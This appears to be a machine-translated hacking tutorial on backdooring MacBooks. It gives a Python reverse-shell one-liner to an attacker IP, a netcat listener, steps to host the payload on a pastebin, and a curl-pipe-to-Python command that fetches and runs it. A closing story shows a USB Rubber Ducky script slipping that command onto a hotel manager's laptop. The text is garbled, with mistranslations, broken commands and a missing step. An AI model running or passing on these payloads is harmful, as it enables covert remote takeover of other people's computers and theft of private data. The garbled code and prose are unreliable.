The misconception that macOS is more secure than the Windows operating system is far from true. With just a small command, a hacker can take over a MacBook completely and control it remotely.
The sheer volume of Windows computers currently in use around the world make hackers a lucrative project for malware developers and bug-hunters. in Windows 10 zero-day exploits. Therefore, there is much more news about Windows 10, although macOS can be just as vulnerable.
When it comes to Mac pwning, one-liner payloads simply create a connection to a MacBook on which an attacker can execute commands. An experienced Python encoder could easily create a sophisticated script to extract sensitive data, record audio through the microphone in real-time, stream the desktop and spy on the target, or automatically perform a variety of post-exploit attacks.
For this new mini series in our hacking macOS collection, I will offer several one-liner commands for hacking MacOS. Here is just a command capable of creating a backdoor and bypassing antivirus software:
import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); sconnect (("1.2. 3.4", 8080)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/bin/bash","-i"]);
This python command is not marked as malicious or suspicious by the macOS firewall (with "Block all incoming connections" enabled) or antiviruses like AVG and Avast, because Python is not a virus one of several technologies that are integrated with the macOS operating system and so misused, much like PowerShell, a legitimate tool for Windows administrators, is abused by hackers.
The Python command is a tedious task, as are lengthy commands and complex ones Summarize payloads into a real hack, with a fictional example of how this might work in the real world.
Step 1: Start Netcat Server
Listen to Setup Netcat ( nc ) ( -l ) for new incoming connections at the port ( -p ) 8080 .Netcat begins monitoring all available interfaces.
nc -l -p 8080
Then save the following Python code as a file named payload.py . This can be done with nano or a favorite text editor.
import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); sconnect (("18.104.22.168", 8080)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call (["/bin/bash","-i"]);
When the command is run on a remote MacBook that uses a Virtual Private Server (VPS) Be sure to use the IP address of the attacker ( 22.214.171.124 ) IP of the server to change. For local networks where the attacker's system is on the same Wi-Fi network as the MacBook, Netcat can be reached using the attacker's local IP address (for example, 192.168.1.18). The port number ( 8080 ) can be changed to a value between 1024 and 65535.
Step 3: Load the payload into a pastebin
Upload the python code into a pastebin. I prefer Pb, a command-line based Pastebin, because the domain name is very short and gives the possibility to name the pastes manually. For example, if I want to upload a Python script, I use the following cURL command:
cat payload.py | curl -Fc = @ - https://ptpb.pw/~PasteNameHere
Here I use cat to read and direct the Python file ( | ) to the cURL command that takes the data ( -F c = @ – ) and sends it to the pb server with the URI "PasteNameHere". The pastebin then prints data in the terminal that confirm that the paste has been created.
cat payload.py | lure -Fc = @ - https://ptpb.pw/~PasteNameHere Digest: a1a045f5546347f5cbf0181328ce4d77550f6ff7 Label: ~ PasteNameHere long: AKGgRfVUY0f1y_AYEyjOTXdVD2_3 in short: D2_3 Size: 7938 Status: created URL: https://ptpb.pw/~PasteNameHere uuid: xxxxxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
If you call the URL from any web browser now, the Python payload will be displayed. The paste name can be anything. If I wanted to create a paste with my username, I would use the following command:
cat payload.py | curl -Fc = @ - https://ptpb.pw/~tokyoneon
Step 4: Hack All MacBooks
From now on, any MacBook can be hacked with the following command. It's a pretty simple command to write to memory. The cURL command downloads the Python code (Stage) with the Python code and runs it as a background process.
curl ptpb.pw / ~tokyoneon | Python -
The real challenge is the social engineering aspect of an attack. How does a hacker get someone to run malicious code? Well, I had some fun this weekend and created a simple scenario in the form of a short story that could show a practical use for hacking macOS with a single one
While this story is completely fictitious and hypothetical I tested the featured attack against macOS High Sierra where Avast (or AVG) was installed. All characters were named after notorious hackers.
The Hotel Manager & The Rubber Duck
A hacker wanted access to a high-quality hotel database that contained private customer information. To get closer to the hotel staff and their internal networks, the hacker decided to spend an evening at the hotel under the nickname "Nathalie Nahai".
Nathalie entered the hotel and did not know it yet, but the normal receptionist was ill on this special evening. This meant that the deputy head of the building worked as a concierge for several hours. After addressing the receptionist in the lobby, Nathalie saw the concierge nameplate read, "Manager: Christopher Hadnagy." It had the hotel logo next to it.
"Good evening and welcome to the Hacked Hotel! How can I help you tonight?" Christopher exclaimed with a beaming smile.
"Hey, Chris," said Nathalie, cooling his full name to create an informal tone for their conversation. "I would like to book a room for the night."
When Christopher began new customer registration at the POS kiosk on the touch screen, Natalie saw an open MacBook on the desk of the reception desk. "Oh, is this the latest MacBook model?" Natalie asked, searching for information, unobtrusively searching her wallet for the USB rubber ducky labeled "macOS." The USB Rubber Ducky payload was designed to create a backdoor that allows remote access to the MacBook.
DELAY 1500 GUI SPACE DELAY 350 STRING port DELAY 100 ENTER DELAY 1000 STRING curl ptpb.pw /~tokyoneon | Python - and ENTER GUI q
"No, not quite," he said, laughing. "It's an older one I use for work, but I wanted to upgrade, and he interrupted himself with," What room do you need tonight? "
" Hmm, what are my options? "Asked Natalie She hid the macOS USB Rubber Ducky in the palm of her hand and hoped for an opportunity to put it into the manager's MacBook.
" Well, our rooms start at $ 425 a night. This is a queen size bed, a bathroom and includes breakfast, access to our pool …. "The manager recited the features and benefits in the various packages and deals at the hotel.To create a way, the USB Rubber Ducky into the MacBook, Natalie asked, "Would you happen to have a booklet or leaflet with all the options? You know, my mother is going to town tonight, and I want to make sure we feel comfortable. "Of course," Christopher replied, reaching for the side of the desk to get a booklet. "
Oh, actually it looks like we're all out there. Give me only one second; I'll get more out of the back office.
The manager rushed out from behind the reception counter and entered the locked room a few feet away, Natalie reached across the desk and slipped the USB payload into the MacBook, which was almost there. A terminal window opened just two seconds after Plugging in the USB Rubby Ducky, and the light on the USB turned from red to green, indicating that the key input was complete.
Nathalie pulled out the USB Rubby Ducky A few seconds later, Christopher came out with a handful of leaflets
"Here's a booklet for you and one for your mother," he said with a smile.
Stay tuned for more one-liner payloads …
This is just a fictional one Example of how someone can create a MacBook or Mac desktop computer with a simple command. There are many more cases where an attacker could get access to a Mac Deliver payload unsuspecting. In future articles I will show how to use lesser-known programs built into MacOS to create backdoors in the MacBook.